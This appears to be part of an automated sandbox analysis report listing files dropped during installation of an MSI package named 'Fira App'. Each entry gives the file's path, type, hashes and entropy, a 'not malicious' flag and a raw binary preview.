SHA-512:	F244025DF4CFCC7316E70E45CE0AEEE448253A92A1EF2BCAA4B2F45FD383BE88C38D24AB2629631EEA6BDDDE98207135EE0C7DF82AC7911B6A15B7C2279FE83B
Malicious:	false
Preview:	............ .\|(............ .(....)..``.... .....:1..HH.... ..T......@@.... .(B..j...00.... ..%...\.. .... .....:......... .............. .h...j....PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx...y....7..^f..a.qaQ.M@e...f0....,.'.<.sN.3.&...F..&.%F.g@.MBD......j4n.A`......G3..=.t.R...9s...U_g....w.W...~....(....`..)G#..@OVli....0vL.l.\...(..D*..PT..3\|...K:.mn..6BQ....H..j..)'A8...A8..K....sr....g ...@..u.f1.b"..L.p..4....X.....m.0..\ .O.;W..j.4..os&....Y....k.3....W....c0}..a0>..........-b@.@....Y L.0..K.tI+.`..m.....@.@.@..._....re........^.p.\.-..)...`.......i..4"..ee83)....l ..0... ...W.........\.NX.gJ...c..{4S!c....f.0]...s3.>.#.`.0.D.... .+K.........\.r..CR.b`.c.. ..,.2..j.y{.RA4....7..........r.mq\|IO.@.l\|..!D......2.Lt.Q)...`..K...t/@[.TRI.Q..KFR."h.c....w........aQ...`...\U.W.O...\n.z..).a....J..A.zYYl0..)....._..+..........~.$.....i.}....L.....xR.!.......C.,..x=.V..:.D$. DO.{.r...{Y)1@...]......U.O..Kr..Z.U"...]..G......Y.du<"@.@

C:\Windows\Installer\5924ec.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5086E490-79C3-4148-ABEE-DF320AB927CB}, Number of Words: 10, Subject: Fira App, Author: Hypera Cisia Quero, Name of Creating Application: Fira App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Fira App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sat Jan 11 11:51:38 2025, Last Saved Time/Date: Sat Jan 11 11:51:38 2025, Last Printed: Sat Jan 11 11:51:38 2025, Number of Pages: 450
Category:	dropped
Size (bytes):	60684288
Entropy (8bit):	7.215706665575828
Encrypted:	false
SSDEEP:	786432:TrBQuVmrjV7eIAteQOTZvoh7Daow1PioEoXTaX/IG4l/gcjTVytq9:TrBVmrjV7eIvQOTZvcaoWPnENWgcu
MD5:	D8056166749F02A5EF16B4457685354E
SHA1:	203328A2A7BEFB59C07082CA34E50D4BCEF19565
SHA-256:	842201299A2233F6582895CF0EE30A911C6B502DB18426F4CBB43A2DB300EDA8
SHA-512:	FAE05DA451CE13C309FB88750C81C8A11FA622A9792C742D0023B98EC4D02E80631CFAEC725FF024CDE98C054DF221CA22A98B5C97EDF5753DCB4FC1ED63248B
Malicious:	false
Preview:	......................>............................................2..................................................................x...............................................................................................................................................%...&...'...(...)......................................................Z"..."..E#..F#..G#..H#..I#..J#..K#..L#..M#..N#..O#..P#..Q#..R#..S#..T#..U#...+...+...,...,...,...,...,...,...,..-0...0../0..00...2...2...2...2...2...2...2...2..............d...........................8...............B................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-...7.../...0...1...2...3...4...5...6.......9...M...:...;...<...=...>...?...@...A...D...C...J...E...F...G...H...I...X...K...L...e...N...O...P...Q...R...S...T...U...V...W...("..""..Z...[...\...]...^..._...`...a...b...c.......~...f...g...h...i...j...k...l...m...n...o...p...q...r.......t...u...v...w...x...y...z...

C:\Windows\Installer\5924ef.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5086E490-79C3-4148-ABEE-DF320AB927CB}, Number of Words: 10, Subject: Fira App, Author: Hypera Cisia Quero, Name of Creating Application: Fira App, Template: x64;2057, Comments: This installer database contains the logic and data required to install Fira App., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sat Jan 11 11:51:38 2025, Last Saved Time/Date: Sat Jan 11 11:51:38 2025, Last Printed: Sat Jan 11 11:51:38 2025, Number of Pages: 450
Category:	dropped
Size (bytes):	60684288
Entropy (8bit):	7.215706665575828
Encrypted:	false
SSDEEP:	786432:TrBQuVmrjV7eIAteQOTZvoh7Daow1PioEoXTaX/IG4l/gcjTVytq9:TrBVmrjV7eIvQOTZvcaoWPnENWgcu
MD5:	D8056166749F02A5EF16B4457685354E
SHA1:	203328A2A7BEFB59C07082CA34E50D4BCEF19565
SHA-256:	842201299A2233F6582895CF0EE30A911C6B502DB18426F4CBB43A2DB300EDA8
SHA-512:	FAE05DA451CE13C309FB88750C81C8A11FA622A9792C742D0023B98EC4D02E80631CFAEC725FF024CDE98C054DF221CA22A98B5C97EDF5753DCB4FC1ED63248B
Malicious:	false
Preview:	......................>............................................2..................................................................x...............................................................................................................................................%...&...'...(...)......................................................Z"..."..E#..F#..G#..H#..I#..J#..K#..L#..M#..N#..O#..P#..Q#..R#..S#..T#..U#...+...+...,...,...,...,...,...,...,..-0...0../0..00...2...2...2...2...2...2...2...2..............d...........................8...............B................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-...7.../...0...1...2...3...4...5...6.......9...M...:...;...<...=...>...?...@...A...D...C...J...E...F...G...H...I...X...K...L...e...N...O...P...Q...R...S...T...U...V...W...("..""..Z...[...\...]...^..._...`...a...b...c.......~...f...g...h...i...j...k...l...m...n...o...p...q...r.......t...u...v...w...x...y...z...

C:\Windows\Installer\MSI2E04.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI2E72.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI2EB2.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI2EF1.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI2F50.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1201504
Entropy (8bit):	6.4557937684843365
Encrypted:	false
SSDEEP:	24576:W4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWeTIUGVUrHtAkJMsFUh29BKjxw:D2QxNwCsec+4VGWSlnfYvO3UGVUrHtAg
MD5:	E83D774F643972B8ECCDB3A34DA135C5
SHA1:	A58ECCFB12D723C3460563C5191D604DEF235D15
SHA-256:	D0A6F6373CFB902FCD95BC12360A9E949F5597B72C01E0BD328F9B1E2080B5B7
SHA-512:	CB5FF0E66827E6A1FA27ABDD322987906CFDB3CDB49248EFEE04D51FEE65E93B5D964FF78095866E197448358A9DE9EC7F45D4158C0913CBF0DBD849883A6E90
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.\|CF..@G.\|DF..@G.\|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...'.$g.........."!...).~..........Pq.......................................`......0.....@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI2F90.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI2FCF.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI4EE1.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	380520
Entropy (8bit):	6.512348002260683
Encrypted:	false
SSDEEP:	6144:ZSXJmYiFGLzkhEFeCPGi5B8dZ6t+6bUSfcqKgAST:ZSXJ9khElPGvcttbxpAST
MD5:	FFDAACB43C074A8CB9A608C612D7540B
SHA1:	8F054A7F77853DE365A7763D93933660E6E1A890
SHA-256:	7484797EA4480BC71509FA28B16E607F82323E05C44F59FFA65DB3826ED1B388
SHA-512:	A9BD31377F7A6ECF75B1D90648847CB83D8BD65AD0B408C4F8DE6EB50764EEF1402E7ACDFF375B7C3B07AC9F94184BD399A10A22418DB474908B5E7A1ADFE263
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^..?{..?{..?{..x..?{..~..?{...x..?{......?{...~..?{.....?{..z..?{..?z..>{..r..?{..{..?{....?{..?.?{..y..?{.Rich.?{.........PE..L...>.$g.........."!...)..................... .......................................'....@A........................@3..X....3.......... ...............h:.......6..@...p...............................@............ ..(............................text...J........................... ..`.rdata...$... ...&..................@..@.data....!...P......................@....fptable.............@..............@....rsrc... ............B..............@..@.reloc...6.......8...\..............@..B........................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI56A3.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	191670
Entropy (8bit):	4.390993077609321
Encrypted:	false
SSDEEP:	768:O+g/v/j9WT5Xg+U57GB0uPJGGbN99NvQIUfGQ9zSN75NsnKcKgM90be1ERgygKEn:vSvb9WTzU5IH2II/+VyKkbIEgKEif2
MD5:	430E705C8DC6AB56F5E440DCDF2DB0B1
SHA1:	71596A596AA9DEE77D92BA7A288717F3C60E771B
SHA-256:	93C42DC565621B3DCF59B84ACA23915841D692AFFDA51A1B85E70AEC2ADA769D
SHA-512:	8DFE4DC8565472E2E1DE4E6EBA3B71172739C579B7A10D87BC15F9145FA16392319E11D9E299B0B21942C49A15C89E3BF1CB765E001720DC8E420BBE1E83E039
Malicious:	false
Preview:	...@IXOS.@.....@.{,Z.@.....@.....@.....@.....@.....@......&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}..Fira App..Setup.msi.@.....@.....@.....@......icon_35.exe..&.{5086E490-79C3-4148-ABEE-DF320AB927CB}.....@.....@.....@.....@.......@.....@.....@.......@......Fira App......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@3....@.....@.]....&.{F39C344E-A83E-4760-8DA8-F27602095B4F}<.C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\.@.......@.....@.....@......&.{BC83E781-7DE2-47A8-97C3-2E6CC9BCAD82}0.21:\Software\Hypera Cisia Quero\Fira App\Version.@.......@.....@.....@......&.{279C32E3-A00A-4513-9A8B-D3984A41A6FB}E.C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\utest.dll.@.......@.....@.....@......&.{B61B35E4-8BE1-4171-B69B-E2423CE9179F}L.C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140.dll.@.......@.....@.....@......&.{FDDB96EE-847D-4B25-

C:\Windows\Installer\MSI56B3.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	787808
Entropy (8bit):	6.693392695195763
Encrypted:	false
SSDEEP:	24576:aE33f8zyjmfyY43pNRmkL7mh0lhSMXlEeGXDMGz+:L3fSyjmfyY43pNRp7T0eGwGz+
MD5:	8CF47242B5DF6A7F6D2D7AF9CC3A7921
SHA1:	B51595A8A113CF889B0D1DD4B04DF16B3E18F318
SHA-256:	CCB57BDBB19E1AEB2C8DD3845CDC53880C1979284E7B26A1D8AE73BBEAF25474
SHA-512:	748C4767D258BFA6AD2664AA05EF7DC16F2D204FAE40530430EF5D1F38C8F61F074C6EC6501489053195B6B6F6E02D29FDE970D74C6AE97649D8FE1FD342A288
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............m..m..m.'n..m.'h.q.m.'i..m.."i..m.."n..m.."h..m.'l..m..l..m.#d..m.#m..m.#...m.....m.#o..m.Rich.m.........PE..L.....$g.........."!...).....4............................................... ............@A........................@J.......J..........................`=......4`...~..p........................... ~..@............................................text............................... ..`.rdata..Z...........................@..@.data...D-...`.......B..............@....fptable.............^..............@....rsrc................`..............@..@.reloc..4`.......b...f..............@..B........................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{337A659D-79FE-4CED-9D18-362BBF6F3DBC}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1622203946430445
Encrypted:	false
SSDEEP:	12:JSbX72FjWlAGiLIlHVRpMh/7777777777777777777777777vDHFygp3Xl0i8Q:J6QI5cY66F
MD5:	D35E37C5A4725C711F748827142670E0
SHA1:	36EED07AB550BB5FBC60A16B302CC7E254F7DF6F
SHA-256:	BED0345AB31195B829922CAAC41B3315FEE9E4825154B0DD9DEAC51B69D2BFDD
SHA-512:	DAB01DD84EF7C3F243878F037CE49EC272DECD97F680C8628C87E82E08E9A86C6FE4E92B41265C072F0EA3E0CD804DECFE822DD47BF3FD3394C86A2F636BC8D5
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5687179286545136
Encrypted:	false
SSDEEP:	48:E8Ph4uRc06WXJ8FT5y7niMoAErCyfSZjjXFmSZKTY:bh41fFT4pwCQCXwk
MD5:	95C1023D3FCD4F2567166A5D87BA13B4
SHA1:	BCFFDEAC68674380F3C6350F928AFF62B78983F1
SHA-256:	A0631D14F23F605153026BAAAD9FC50D7877769746B36C07A3050B19FD9F6445
SHA-512:	B96961E54D86621D1C5721840DE1667164FFE1254E27658A2C77AEF4C88C3C6DE3F5C369DBECD31A47598F5121C6C4E3623EAAB6F23D0260BA3359456AB3B82A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	364484
Entropy (8bit):	5.365487998756921
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauq:zTtbmkExhMJCIpEV
MD5:	8330BFD85482263D37029F3925D6093D
SHA1:	915548C1D0978E42EA6C9C519B4EB4C83BD59530
SHA-256:	ED22CF2A49B3E7D6D080556E7EBA167EF7761BA19B2413678837436A0B26741C
SHA-512:	5B2A2696BE717CB57B3674629B7952ADA957F674B484D4A4A88BB72035ECC9DB763C0AD92A5760D8BEB6D9EE1063F1D7AB2110C0763B1059D29519D205AD8B10
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF03E2D83F2F4A9670.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1E0668042BDB3E21.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5687179286545136
Encrypted:	false
SSDEEP:	48:E8Ph4uRc06WXJ8FT5y7niMoAErCyfSZjjXFmSZKTY:bh41fFT4pwCQCXwk
MD5:	95C1023D3FCD4F2567166A5D87BA13B4
SHA1:	BCFFDEAC68674380F3C6350F928AFF62B78983F1
SHA-256:	A0631D14F23F605153026BAAAD9FC50D7877769746B36C07A3050B19FD9F6445
SHA-512:	B96961E54D86621D1C5721840DE1667164FFE1254E27658A2C77AEF4C88C3C6DE3F5C369DBECD31A47598F5121C6C4E3623EAAB6F23D0260BA3359456AB3B82A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7A392CADE3F64214.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2566202634578798
Encrypted:	false
SSDEEP:	48:lVwuAO+CFXJxT5Es7niMoAErCyfSZjjXFmSZKTY:rwCJTuYpwCQCXwk
MD5:	87FCCC0DA73F0774C8BD2499B9AA5CC7
SHA1:	04D9817B853F689CA5FEB8510E78CBBC9526D9D1
SHA-256:	9364C04B2981811C361BD9352080252B3ACCF2EE67A93A3246CFD1A01949F4B5
SHA-512:	21E24624F6E9738B110DC75FF8F1BD455AE65D3F18062C329EEFA265498876B7B019C3008BADD7E07909D80070C6B203FD4F6362438631EF71A81568BA197345
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7B25CF68A450C04E.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF89A4D5824D084A0C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.13891175463794297
Encrypted:	false
SSDEEP:	24:8GR7Tx0ymipV0yE0yiMoAEV0yjCyfipV0yjVQwGUr800+L:8UT1mSZyiMoAErCyfSZjjX0c
MD5:	F96C9B71A4933D8977E0B74CB59842C4
SHA1:	DC511F324A93CBEF2892FAA4C097838FC6D89136
SHA-256:	69DEAA41669E07CB5A6CF8C74AE8DAF0F778D38C889E592CEDB58BF8DA771F04
SHA-512:	D5A6BCAFE16E6C43F4A54AA5D10EB251FF6002159058E8FF9BF5B0CAC60CC8A4B9E1C7105FD15059DD4E11CA0F912012106C8EF259E930CE6A54699AAC37B1EC
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF9B69DCCFB4C743E7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAF5FBFA06E5339A2.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5687179286545136
Encrypted:	false
